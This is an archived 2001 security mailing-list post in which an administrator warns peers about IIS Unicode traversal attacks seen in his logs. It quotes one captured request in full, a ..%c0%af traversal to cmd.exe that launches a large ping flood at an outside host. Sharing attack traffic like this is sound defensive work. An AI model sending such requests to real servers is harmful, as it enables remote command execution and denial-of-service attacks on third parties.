Hi In the past monthe I get quite a few of IIS Unicode attacks, but a bi strange. Thecome from a bit everywhere, and are very similar. It trie to use the vulnerability do ping other machines. 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25 c0%af..%c0%af..% 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25 c0%af..%c0%af..% 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25 c0%af..%c0%af..% 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2F 77 69 c0%af..%c0%af/wi 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 nnt/system32/cmd 2E 65 78 65 3F 2F 63 25 32 30 70 69 6E 67 25 32 .exe?/c%20ping%2 30 2D 76 25 32 30 74 69 6D 65 73 74 61 6D 70 2D 0-v%20timestamp- 72 65 70 6C 79 25 32 30 2D 6E 25 32 30 39 39 39 reply%20-n%20999 39 39 39 39 39 39 39 39 39 39 39 25 32 30 2D 6C 99999999999%20-l 25 32 30 36 35 35 30 30 25 32 30 2D 77 25 32 30 %2065500%20-w%20 30 25 32 30 64 75 6E 67 65 6F 6E 66 79 72 65 2E 0%20dungeonfyre. 66 78 63 68 61 74 2E 6E 65 74 0D 0A fxchat.net.. This could be used for DDOS as the number of packets is high, as well as the size ? Watch out... Yoann Le Corvic - Internet Administrator Email : yoann.lecorvic@infrasoft-civil.com Web : http://www.infrasoft-civil.com/ ======================== Infrasoft Ltd North Heath Lane Horsham, West Sussex RH12 5QE United Kingdom Tel : +44 (0)1403 259511 Fax : +44 (0)1403 217728 ********************************************************************** The information contained in this message or any of its attachments is confidential and is intended for the exclusive use of the addressee. The information may also be legally privileged. The views expressed may not be those of Infrasoft, but the personal views of the originator. If you are not the addressee, any disclosure, reproduction, distribution or other dissemination or use of this communication is strictly prohibited. If you have received this message in error, please contact : postmaster@infrasoft-civil.com and delete this message. **********************************************************************"
This archive was generated by hypermail 2b30 : Fri May 25 2001 - 10:51:12 PDT